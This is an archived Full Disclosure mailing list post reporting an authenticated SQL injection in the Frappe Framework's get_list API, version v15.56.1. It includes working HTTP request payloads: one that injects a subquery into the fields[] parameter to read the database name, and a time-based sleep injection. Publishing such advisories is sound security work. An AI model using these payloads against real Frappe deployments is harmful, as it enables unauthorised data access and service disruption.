| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <2D44FEA4-617A-4CDB-AFA0-E65D8B9746C8@gmail.com>
Date: Tue, 27 May 2025 17:04:14 -0400
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Structured Query Language Injection in
frappe.desk.reportview.get_list Endpoint in Frappe Framework
An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause.
Sample Structured Query Language Injection:
Request:
GET /api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr%2c(SELECT%20database())%20AS%20current_db%22%5D&doctype=Salary%20Component&limit=20&_=1748066407934 HTTP/2
Host: --host--
Cookie: ******
--snip--
Response:
HTTP/2 200 OK
{"message":[{"salary_component_abbr":"H***","current_db":"_**************"},
--snip--
Time based attack:
Request
GET /api/method/frappe.desk.reportview.get_list?fields=[%22salary_component_abbr%2c(select*from(select(sleep(200)))a)%22]&doctype=Salary%20Component&limit=20&_=1748066407933 HTTP/2
Host: --host--
Cookie: ******
--snip--
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists